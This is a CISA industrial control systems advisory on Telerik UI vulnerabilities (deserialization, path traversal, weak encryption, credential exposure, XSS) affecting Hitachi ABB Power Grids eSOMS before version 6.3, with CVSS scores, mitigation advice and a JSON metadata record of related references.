Hitachi ABB Power Grids eSOMS Telerik

2021-03-18T00:00:00

Description

## 1\. EXECUTIVE SUMMARY * **CVSS v3 9.8** * **ATTENTION: **Exploitable remotely/low skill level to exploit * **Vendor:** Hitachi ABB Power Grids * **Equipment: **eSOMS Telerik * **Vulnerabilities:** Path Traversal, Deserialization of Untrusted Data, Improper Input Validation, Inadequate Encryption Strength, Insufficiently Protected Credentials, Path Traversal ## 2\. RISK EVALUATION Successful exploitation of these vulnerabilities could allow an attacker to upload malicious files to the server, discover sensitive information, or execute arbitrary code. ## 3\. TECHNICAL DETAILS ### 3.1 AFFECTED PRODUCTS Hitachi ABB Power Grids reports the vulnerabilities affect the following eSOMS products: * eSOMS, all versions prior to 6.3 using a version of Telerik software ### 3.2 VULNERABILITY OVERVIEW #### 3.2.1 [PATH TRAVERSAL CWE-22](<https://cwe.mitre.org/data/definitions/22.html>) Path traversal in RadChart in Telerik UI for ASP.NET AJAX allows a remote attacker to read and delete an image with extension .BMP, .EXIF, .GIF, .ICON, .JPEG, .PNG, .TIFF, or .WMF on the server through a specially crafted request. [CVE-2019-19790](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-19790>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)). #### 3.2.2 [DESERIALIZATION OF UNTRUSTED DATA CWE-502](<https://cwe.mitre.org/data/definitions/502.html>) Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known. [CVE-2019-18935](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-18935>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)). #### 3.2.3 [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>) Progress Telerik UI for ASP.NET AJAX before R2 2017 SP2 does not properly restrict user input to RadAsyncUpload, which allows remote attackers to perform arbitrary file uploads or execute arbitrary code. [CVE-2017-11357](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11357>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)). #### 3.2.4 [INADEQUATE ENCRYPTION STRENGTH CWE-326](<https://cwe.mitre.org/data/definitions/326.html>) Telerik.Web.UI in Progress Telerik UI for ASP.NET AJAX before R1 2017 and R2 before R2 2017 SP2 uses weak RadAsyncUpload encryption, which allows remote attackers to perform arbitrary file uploads or execute arbitrary code. [CVE-2017-11317](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11317>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)). #### 3.2.5 [INSUFFICIENTLY PROTECTED CREDENTIALS CWE-522](<https://cwe.mitre.org/data/definitions/522.html>) Telerik.Web.UI.dll in Progress Telerik UI for ASP.NET AJAX before R2 2017 SP1 and Sitefinity before 10.0.6412.0 does not properly protect Telerik.Web.UI.DialogParametersEncryptionKey or the MachineKey, which makes it easier for remote attackers to defeat cryptographic protection mechanisms, leading to a MachineKey leak, arbitrary file uploads or downloads, XSS, or ASP.NET ViewState compromise. [CVE-2017-9248](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-9248>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)). #### 3.2.6 [PATH TRAVERSAL CWE-22](<https://cwe.mitre.org/data/definitions/22.html>) Absolute path traversal vulnerability in the RadAsyncUpload control in the RadControls in Telerik UI for ASP.NET AJAX before Q3 2012 SP2 allows remote attackers to write to arbitrary files, and consequently execute arbitrary code, via a full pathname in the UploadID metadata value. [CVE-2014-2217](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2217>) has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N>)). #### 3.2.7 [PATH TRAVERSAL CWE-22](<https://cwe.mitre.org/data/definitions/22.html>) Cross-site scripting (XSS) vulnerability in Telerik UI for ASP.NET AJAX RadEditor control 2014.1.403.35, 2009.3.1208.20, and other versions allows remote attackers to inject arbitrary web script or HTML via CSS expressions in style attributes. [CVE-2014-4958](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4958>) has been assigned to this vulnerability. A CVSS v3 base score of 4.3 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N>)). ### 3.3 BACKGROUND * **CRITICAL INFRASTRUCTURE SECTORS:** Energy * **COUNTRIES/AREAS DEPLOYED: **Worldwide * **COMPANY HEADQUARTERS LOCATION: **Switzerland ### 3.4 RESEARCHER Hitachi ABB Power Grids reported these vulnerabilities to CISA. ## 4\. MITIGATIONS Hitachi ABB Power Grids has published an [advisory for eSOMS Telerik](<https://search.abb.com/library/Download.aspx?DocumentID=9AKK107991A8943&LanguageCode=en&DocumentPartId=&Action=Launch>) and advises users to update to eSOMS Version 6.3 as soon as possible. For additional information and support, contact a product provider or Hitachi ABB Power Grids service organization. For contact information, visit [Hitachi ABB Power Grids contact-centers](<https://www.hitachiabb-powergrids.com/contact-us/>). Recommended security practices and firewall configurations can help protect a process control network from attacks that originate from outside the network. Such practices include ensuring applications and servers are physically protected from direct access by unauthorized personnel, have no direct connections to the Internet, are separated from other networks by means of a firewall system that has a minimal number of ports exposed, and others that must be evaluated case by case. Sensitive application servers should not be used for Internet surfing, instant messaging, or receiving e-mails. Portable computers and removable storage media should be carefully scanned for viruses before they are connected to a control system. CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for [control systems security recommended practices](<https://us-cert.cisa.gov/ics/recommended-practices>) on the ICS webpage on [us-cert.cisa.gov](<https://us-cert.cisa.gov/ics>). Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>). Additional mitigation guidance and recommended practices are publicly available on the [ICS webpage on us-cert.cisa.gov](<https://us-cert.cisa.gov/ics>) in the Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://us-cert.cisa.gov/ics/tips/ICS-TIP-12-146-01B>). Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents. No known public exploits specifically target these vulnerabilities. ## Contact Information For any questions related to this report, please contact the CISA at: Email: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) Toll Free: 1-888-282-0870 For industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics or incident reporting: https://us-cert.cisa.gov/report CISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product. This product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy. **Please share your thoughts.** We recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/icsa-21-077-03>); we'd welcome your feedback.

{"id": "ICSA-21-077-03", "vendorId": null, "type": "ics", "bulletinFamily": "info", "title": "Hitachi ABB Power Grids eSOMS Telerik", "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 9.8**\n * **ATTENTION: **Exploitable remotely/low skill level to exploit\n * **Vendor:** Hitachi ABB Power Grids\n * **Equipment: **eSOMS Telerik\n * **Vulnerabilities:** Path Traversal, Deserialization of Untrusted Data, Improper Input Validation, Inadequate Encryption Strength, Insufficiently Protected Credentials, Path Traversal\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of these vulnerabilities could allow an attacker to upload malicious files to the server, discover sensitive information, or execute arbitrary code.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nHitachi ABB Power Grids reports the vulnerabilities affect the following eSOMS products: \n\n * eSOMS, all versions prior to 6.3 using a version of Telerik software \n\n### 3.2 VULNERABILITY OVERVIEW\n\n#### 3.2.1 [PATH TRAVERSAL CWE-22](<https://cwe.mitre.org/data/definitions/22.html>)\n\nPath traversal in RadChart in Telerik UI for ASP.NET AJAX allows a remote attacker to read and delete an image with extension .BMP, .EXIF, .GIF, .ICON, .JPEG, .PNG, .TIFF, or .WMF on the server through a specially crafted request. \n\n[CVE-2019-19790](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-19790>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.2 [DESERIALIZATION OF UNTRUSTED DATA CWE-502](<https://cwe.mitre.org/data/definitions/502.html>)\n\nProgress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known. \n\n[CVE-2019-18935](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-18935>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.3 [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)\n\nProgress Telerik UI for ASP.NET AJAX before R2 2017 SP2 does not properly restrict user input to RadAsyncUpload, which allows remote attackers to perform arbitrary file uploads or execute arbitrary code. \n\n[CVE-2017-11357](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11357>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.4 [INADEQUATE ENCRYPTION STRENGTH CWE-326](<https://cwe.mitre.org/data/definitions/326.html>)\n\nTelerik.Web.UI in Progress Telerik UI for ASP.NET AJAX before R1 2017 and R2 before R2 2017 SP2 uses weak RadAsyncUpload encryption, which allows remote attackers to perform arbitrary file uploads or execute arbitrary code. \n\n[CVE-2017-11317](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11317>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.5 [INSUFFICIENTLY PROTECTED CREDENTIALS CWE-522](<https://cwe.mitre.org/data/definitions/522.html>)\n\nTelerik.Web.UI.dll in Progress Telerik UI for ASP.NET AJAX before R2 2017 SP1 and Sitefinity before 10.0.6412.0 does not properly protect Telerik.Web.UI.DialogParametersEncryptionKey or the MachineKey, which makes it easier for remote attackers to defeat cryptographic protection mechanisms, leading to a MachineKey leak, arbitrary file uploads or downloads, XSS, or ASP.NET ViewState compromise. \n\n[CVE-2017-9248](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-9248>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.6 [PATH TRAVERSAL CWE-22](<https://cwe.mitre.org/data/definitions/22.html>)\n\nAbsolute path traversal vulnerability in the RadAsyncUpload control in the RadControls in Telerik UI for ASP.NET AJAX before Q3 2012 SP2 allows remote attackers to write to arbitrary files, and consequently execute arbitrary code, via a full pathname in the UploadID metadata value. \n\n[CVE-2014-2217](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2217>) has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N>)).\n\n#### 3.2.7 [PATH TRAVERSAL CWE-22](<https://cwe.mitre.org/data/definitions/22.html>)\n\nCross-site scripting (XSS) vulnerability in Telerik UI for ASP.NET AJAX RadEditor control 2014.1.403.35, 2009.3.1208.20, and other versions allows remote attackers to inject arbitrary web script or HTML via CSS expressions in style attributes. \n\n[CVE-2014-4958](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4958>) has been assigned to this vulnerability. A CVSS v3 base score of 4.3 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N>)).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Energy\n * **COUNTRIES/AREAS DEPLOYED: **Worldwide\n * **COMPANY HEADQUARTERS LOCATION: **Switzerland\n\n### 3.4 RESEARCHER\n\nHitachi ABB Power Grids reported these vulnerabilities to CISA.\n\n## 4\\. MITIGATIONS\n\nHitachi ABB Power Grids has published an [advisory for eSOMS Telerik](<https://search.abb.com/library/Download.aspx?DocumentID=9AKK107991A8943&LanguageCode=en&DocumentPartId=&Action=Launch>) and advises users to update to eSOMS Version 6.3 as soon as possible. \n\nFor additional information and support, contact a product provider or Hitachi ABB Power Grids service organization. For contact information, visit [Hitachi ABB Power Grids contact-centers](<https://www.hitachiabb-powergrids.com/contact-us/>).\n\nRecommended security practices and firewall configurations can help protect a process control network from attacks that originate from outside the network. Such practices include ensuring applications and servers are physically protected from direct access by unauthorized personnel, have no direct connections to the Internet, are separated from other networks by means of a firewall system that has a minimal number of ports exposed, and others that must be evaluated case by case. Sensitive application servers should not be used for Internet surfing, instant messaging, or receiving e-mails. Portable computers and removable storage media should be carefully scanned for viruses before they are connected to a control system.\n\nCISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nCISA also provides a section for [control systems security recommended practices](<https://us-cert.cisa.gov/ics/recommended-practices>) on the ICS webpage on [us-cert.cisa.gov](<https://us-cert.cisa.gov/ics>). Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the [ICS webpage on us-cert.cisa.gov](<https://us-cert.cisa.gov/ics>) in the Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://us-cert.cisa.gov/ics/tips/ICS-TIP-12-146-01B>). \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.\n\nNo known public exploits specifically target these vulnerabilities.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/icsa-21-077-03>); we'd welcome your feedback.\n", "published": "2021-03-18T00:00:00", "modified": "2021-03-18T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.us-cert.gov/ics/advisories/icsa-21-077-03", "reporter": "Industrial Control Systems Cyber Emergency Response Team", "references": ["https://www.cisa.gov/uscert", "https://www.cisa.gov", "https://www.cisa.gov", "https://www.cisa.gov/ics", "https://twitter.com/share?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2Ficsa-21-077-03", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2Ficsa-21-077-03", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2Ficsa-21-077-03", "https://cwe.mitre.org/data/definitions/22.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-19790", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "https://cwe.mitre.org/data/definitions/502.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-18935", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "https://cwe.mitre.org/data/definitions/20.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11357", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "https://cwe.mitre.org/data/definitions/326.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11317", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "https://cwe.mitre.org/data/definitions/522.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-9248", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "https://cwe.mitre.org/data/definitions/22.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2217", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "https://cwe.mitre.org/data/definitions/22.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4958", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "https://search.abb.com/library/Download.aspx?DocumentID=9AKK107991A8943&LanguageCode=en&DocumentPartId=&Action=Launch", "https://www.hitachiabb-powergrids.com/contact-us/", "https://us-cert.cisa.gov/ics/recommended-practices", "https://us-cert.cisa.gov/ics", "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf", "https://us-cert.cisa.gov/ics", "https://us-cert.cisa.gov/ics/tips/ICS-TIP-12-146-01B", "https://www.dhs.gov/privacy-policy", "https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/icsa-21-077-03", "http://twitter.com/icscert", "https://www.dhs.gov", "https://www.dhs.gov/freedom-information-act-foia", "https://www.dhs.gov/homeland-security-no-fear-act-reporting", "https://www.dhs.gov/plain-writing-dhs", "https://www.dhs.gov/plug-information", "https://www.oig.dhs.gov/", "https://www.whitehouse.gov/", "https://www.usa.gov/", "https://www.dhs.gov/"], "cvelist": ["CVE-2014-2217", "CVE-2014-4958", "CVE-2017-11317", "CVE-2017-11357", "CVE-2017-9248", "CVE-2019-18935", "CVE-2019-19790"], "immutableFields": [], "lastseen": "2022-04-26T21:45:47", "viewCount": 105, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:90DDDBF9-EA58-4470-B821-C35007A64BD6", "AKB:971956B9-232E-41FA-B307-2078E26F310E", "AKB:A6C918C9-3E53-4E56-AE61-3832C73F821D", "AKB:F65287D3-DA1A-4B44-BDB0-9E3210398F75"]}, {"type": "cert", "idList": ["VU:838200"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-1057", "CPAI-2019-0396", "CPAI-2019-1914"]}, {"type": "cve", "idList": ["CVE-2014-2217", "CVE-2014-4958", "CVE-2017-11317", "CVE-2017-11357", "CVE-2017-9248", "CVE-2019-18935", "CVE-2019-19790", "CVE-2021-29281", "CVE-2021-44029"]}, {"type": "exploitdb", "idList": ["EDB-ID:43873", "EDB-ID:43874", "EDB-ID:47793"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:AC453F09E5BC0D2354DD309296F804BF", "EXPLOITPACK:AE2D3F648B410F57DC5F105EDA166E2B", "EXPLOITPACK:C25B99FCFCE90C12FBCCCC43A0BEB5F4"]}, {"type": "githubexploit", "idList": ["05081BAE-6AEB-5206-8BEC-6D067EE4B660", "1741E720-F85A-5179-AB8A-D6FA2E185092", "46B4DA3A-0DEC-5F0E-980A-B17A1CB688F1", "6AF629CA-DC22-5740-AC2B-CA18189D299D", "92BBBF7B-026E-553A-883B-AEF503046C18", "A04C30E0-722D-5CF4-B80A-547C1C702024"]}, {"type": "hackerone", "idList": ["H1:838196", "H1:913695"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D"]}, {"type": "kitploit", "idList": ["KITPLOIT:1207079539580982634", "KITPLOIT:6757608442546057638", "KITPLOIT:8244477187189155516"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:50C9DC65EC310574BE96E803DA88D886"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-HTTP-TELERIK_RAU_DESERIALIZATION-"]}, {"type": "nessus", "idList": ["DOTNETNUKE_9_5_0.NASL", "DOTNETNUKE_9_6_0.NASL", "TELERIK_UI_FOR_ASPNET_AJAX_CVE-2017-11317.NASL", "TELERIK_UI_FOR_ASPNET_AJAX_CVE-2017-9248.NASL", "TELERIK_UI_FOR_ASPNET_AJAX_CVE-2019-18935.NASL", "WEB_APPLICATION_SCANNING_112501", "WEB_APPLICATION_SCANNING_112521", "WEB_APPLICATION_SCANNING_112522", "WEB_APPLICATION_SCANNING_112523"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:159653"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31198", "SECURITYVULNS:VULN:14008"]}, {"type": "thn", "idList": ["THN:942BFBB34DF6A24E460572684F648005", "THN:B95DC27A89565323F0F8E6350D24D801"]}, {"type": "threatpost", "idList": ["THREATPOST:58D6B44423A20EFC8CC4AD8B195A7228", "THREATPOST:7EE86D3945B51C9DF608A4C06739A5F7", "THREATPOST:A94AAFAF28062A447CCD0F4C47FFD78C", "THREATPOST:D15D3ADBA9A153B33E9ADCC9E9D6E07D", "THREATPOST:DDF98CD337434196370FDCA7D39C0ED0", "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "THREATPOST:FD8657F42A74CEDAA8D3F25A2362E6E8"]}, {"type": "veracode", "idList": ["VERACODE:25764", "VERACODE:25765", "VERACODE:25766", "VERACODE:25767"]}, {"type": "zdt", "idList": ["1337DAY-ID-33683", "1337DAY-ID-35085"]}]}, "score": {"value": 0.8, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:90DDDBF9-EA58-4470-B821-C35007A64BD6"]}, {"type": "cert", "idList": ["VU:838200"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-1057", "CPAI-2019-0396", "CPAI-2019-1914"]}, {"type": "cve", "idList": ["CVE-2014-2217", "CVE-2014-4958", "CVE-2017-11317", "CVE-2017-11357", "CVE-2019-18935", "CVE-2019-19790"]}, {"type": "exploitdb", "idList": ["EDB-ID:43873", "EDB-ID:43874", "EDB-ID:47793"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:AE2D3F648B410F57DC5F105EDA166E2B"]}, {"type": "githubexploit", "idList": ["05081BAE-6AEB-5206-8BEC-6D067EE4B660", "1741E720-F85A-5179-AB8A-D6FA2E185092", "46B4DA3A-0DEC-5F0E-980A-B17A1CB688F1", "6AF629CA-DC22-5740-AC2B-CA18189D299D", "92BBBF7B-026E-553A-883B-AEF503046C18", "A04C30E0-722D-5CF4-B80A-547C1C702024"]}, {"type": "hackerone", "idList": ["H1:838196"]}, {"type": "ics", "idList": ["ICSA-13-011-01", "ICSA-13-149-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D"]}, {"type": "kitploit", "idList": ["KITPLOIT:6757608442546057638", "KITPLOIT:8244477187189155516"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:50C9DC65EC310574BE96E803DA88D886"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/TELERIK_RAU_DESERIALIZATION/"]}, {"type": "nessus", "idList": ["TELERIK_UI_FOR_ASPNET_AJAX_CVE-2017-9248.NASL", "TELERIK_UI_FOR_ASPNET_AJAX_CVE-2019-18935.NASL", "WEB_APPLICATION_SCANNING_112521", "WEB_APPLICATION_SCANNING_112522", "WEB_APPLICATION_SCANNING_112523"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:159653"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D"]}, {"type": "thn", "idList": ["THN:942BFBB34DF6A24E460572684F648005", "THN:B95DC27A89565323F0F8E6350D24D801"]}, {"type": "threatpost", "idList": ["THREATPOST:58D6B44423A20EFC8CC4AD8B195A7228", "THREATPOST:A94AAFAF28062A447CCD0F4C47FFD78C", "THREATPOST:D15D3ADBA9A153B33E9ADCC9E9D6E07D", "THREATPOST:FD8657F42A74CEDAA8D3F25A2362E6E8"]}, {"type": "zdt", "idList": ["1337DAY-ID-33683"]}]}, "exploitation": null, "vulnersScore": 0.8}, "_state": {"dependencies": 1660012827, "score": 1659986029}, "_internal": {"score_hash": "38f9f2e063abdbca456316dfa4724b91"}}

